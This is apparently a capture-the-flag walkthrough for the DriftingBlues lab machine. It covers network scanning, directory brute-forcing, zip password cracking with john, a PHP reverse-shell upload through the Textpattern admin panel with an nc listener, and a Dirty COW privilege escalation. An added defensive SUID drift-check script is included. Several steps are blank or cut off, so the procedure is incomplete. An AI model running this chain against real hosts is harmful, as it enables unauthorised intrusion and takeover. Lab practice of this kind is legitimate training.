target address:,672/

1. Host discovery

arp-scan -i eth0 -l (scan on the specified interface): lists every device on the LAN with its IP, MAC address and vendor
masscan -p 80,22 (network segment) : masscan with -p scans the given ports across the segment
netdiscover -i eth0 -r (network segment)
nmap -sn (network segment)

2. Port scan

nmap -sS -A -sV -T4 -p- (target)
80/tcp - http - Apache httpd 2.2.22 ((Debian))

3. Port 80: browsing the site turns up nothing, so check the page source and then run a directory scan

gobuster dir -u "" -w /root/tools/directory-list-2.3-medium.txt -x php,html,txt,zip,bak

Our old friend /robots.txt shows up; visiting it gives the following

User-agent: *
Disallow: /textpattern/textpattern

dont forget to add .zip extension to your dir-brute

Visiting /textpattern/textpattern/ shows the following (screenshot omitted)
Fingerprinting identifies the CMS as Textpattern
robots.txt also hints not to forget the .zip extension; the directory scan result does contain a / (path not shown in the source), so download that archive. It asks for a password when you try to open it.
4. Crack the zip archive password on Kali

1. zip2john <downloaded archive.zip> > password.txt
2. john --wordlist=/usr/share/wordlists/rockyou.txt password.txt

The password is myspace4. Extract the archive, open the file inside and read its contents to get the credentials: Mayer: Lionheart
5. After logging in, the CMS reports its version as 4.8.3

Idea 1: local exploit lookup on Kali: searchsploit textpattern 4.8.3; tested, did not work
Idea 2: look for an exploitable feature in the admin backend

Under Content there is a file upload function.
Upload a PHP reverse-shell file (remember to change the IP and port inside the shell to your own Kali IP and listener port); the page does not display anything after the upload,
but the upload path is visible in the admin management interface.

Start a listener on Kali: nc -lvnp 1234
Visit the uploaded shell to receive the reverse shell

Use python to upgrade to a bash TTY: python -c 'import pty; pty.spawn("/bin/bash")'

6. Privilege escalation

1. Try SUID binaries: find / -perm -u=s -type f 2>/dev/null
 In https: / 

2. uname -a
Linux DriftingBlues 3.2.0-4-AMD

Then we log in as firefart with the password we set ourselves (I entered root) and get root privileges
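The SUID enumeration in step 6 has a defender-side counterpart: compare the host's current SUID inventory against an approved baseline so that any setuid file that should not be there shows up as drift. This is an added example, not part of the original write-up; the function name suid_drift and the baseline format (one approved absolute path per line, # comments allowed) are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original write-up): report SUID files that are
# not on an approved baseline. Names and baseline format are assumed here.

# suid_drift ROOT BASELINE
#   ROOT     : directory tree to scan (use / on a real host)
#   BASELINE : file listing approved SUID paths, one per line, # comments allowed
# Prints every SUID file under ROOT that is missing from BASELINE.
# Returns 0 when the host matches the baseline, 1 when drift was found,
# 2 when temp files could not be created.
suid_drift() {
    root="$1"
    baseline="$2"
    tmp_found=$(mktemp) || return 2
    tmp_base=$(mktemp) || return 2
    # Current SUID inventory, sorted because comm(1) needs sorted input
    find "$root" -perm -u=s -type f 2>/dev/null | sort -u > "$tmp_found"
    # Baseline with blank lines and comments removed, same sort order
    grep -v -e '^[[:space:]]*#' -e '^[[:space:]]*$' "$baseline" | sort -u > "$tmp_base"
    # comm -23: lines only in the inventory, i.e. SUID files nobody approved
    drift=$(comm -23 "$tmp_found" "$tmp_base")
    rm -f "$tmp_found" "$tmp_base"
    if [ -n "$drift" ]; then
        printf '%s\n' "$drift"
        return 1
    fi
    return 0
}
```

Run it from a cron job or a configuration-management check and alert on a non-zero exit; the printed paths are the files to investigate.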

1. Information gathering: obtain the sensitive file
2. zip2john + john to crack the zip password
3. Use the backend file upload to get a webshell
4. Dirty COW privilege escalation to get root

The end, scatter the flowers ~

Write-up provided by Peng Group Safety Master
